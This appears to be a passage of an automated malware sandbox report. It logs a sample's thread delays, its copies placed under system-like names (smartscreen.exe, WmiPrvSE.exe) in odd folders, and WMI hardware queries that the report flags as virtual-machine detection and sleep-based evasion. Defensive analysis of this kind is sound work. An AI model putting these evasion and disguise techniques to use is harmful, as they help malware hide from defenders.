Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -588453s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -588257s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -588019s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -587594s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -587391s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -587190s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -586922s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -586562s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -586348s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -585984s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -585743s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -585031s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -584708s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -584125s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -583953s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -583500s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -583371s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -582766s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -582531s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -582396s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -581172s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -579531s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -579234s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -579022s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -578594s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -578247s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -578062s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -577641s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -576484s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -576234s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -576086s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -575939s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -575793s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -575685s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -575566s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -575395s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -575237s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -575122s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -574993s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -574219s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -574040s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -573725s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -573437s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -573062s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -572828s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -572422s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -572196s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -572016s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -571797s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -571453s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -571222s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -570984s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -570812s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -570547s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -569516s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -568964s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -568687s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -568394s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -568178s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -568036s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -567902s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -567680s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -566844s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -566699s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -566420s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -566281s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -566141s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -565964s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -565816s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -565702s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -565509s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -565406s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -565199s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -565014s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -564885s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -564781s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -564669s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -564560s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -564452s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -564343s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -564234s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -564125s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -564016s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -563906s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -563797s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -563683s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -563566s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -563453s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -563341s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -563234s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -563125s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -562002s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -561887s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -561780s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -561672s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -561562s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -561438s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -561328s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -561157s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -561047s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -560934s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -560817s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -560703s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -560585s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -559885s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 9952 Thread sleep time: -559757s >= -30000s
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 8420 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Downloads\smartscreen.exe TID: 8112 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Downloads\smartscreen.exe TID: 8408 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\WmiPrvSE.exe TID: 8104 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Recovery\WmiPrvSE.exe TID: 8424 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe TID: 5292 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8684 Thread sleep count: 2103 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9856 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9508 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4708 Thread sleep count: 2196 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9900 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9548 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9220 Thread sleep count: 2087 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10084 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9680 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9224 Thread sleep count: 2269 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10088 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9672 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9276 Thread sleep count: 1867 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9968 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9724 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9360 Thread sleep count: 1949 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9964 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9600 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9408 Thread sleep count: 2441 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10108 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10108 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9824 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9444 Thread sleep count: 1950 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9884 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9556 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9424 Thread sleep count: 2042 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10104 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9800 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9448 Thread sleep count: 2068 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10120 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9792 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9488 Thread sleep count: 2012 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10100 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9816 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9492 Thread sleep count: 2423 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10116 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 10116 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9808 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 10032 Thread sleep time: -30000s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Downloads\smartscreen.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Downloads\smartscreen.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\WmiPrvSE.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Recovery\WmiPrvSE.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 599719 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 599516 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 599297 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 599078 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 598469 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 598125 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 597942 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 99812 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 99636 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 99438 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 99250 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 99070 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 98929 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 98782 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 98657 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 98530 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 595688 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 595529 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 595328 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 595125 Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
